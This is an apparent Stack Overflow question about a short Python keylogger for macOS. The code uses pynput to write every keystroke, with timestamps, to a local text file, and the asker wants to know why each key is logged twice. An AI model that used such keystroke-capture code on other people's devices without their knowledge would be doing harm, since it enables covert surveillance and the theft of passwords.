# Key Stroke logging: Records both pressed and released

Tags: python-3.x, macos, keylogger

Here Is the keylogger Code:

```
''' from pynput.keyboard import Key, Listener
import logging

log_dir = r"/Users/user/Desktop/submit/Keylogger.txt "
logging.basicConfig(filename=(log_dir + "keyLog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')


def on_press(key):
    logging.info(str(key))


def on_release(key):
    print('{}'.format(key))
    if str(key) == 'Key.esc':
        print('Exiting...')
        return False


with Listener(on_press=on_press) as listener:
    listener.join() '''
```

When ever I run it, it works fine but for one thing: It records in double, so ill see A A and B B for one word. How can I fix this? (python3, MacOS)

Comment: (I know there is the ''' that was meant for the code in stack overflow, its not in my code)

Comment: worked great for me (also ran on Mac), what version of python and pynput do you use?

Comment: python3 and supposedly pynput 6.2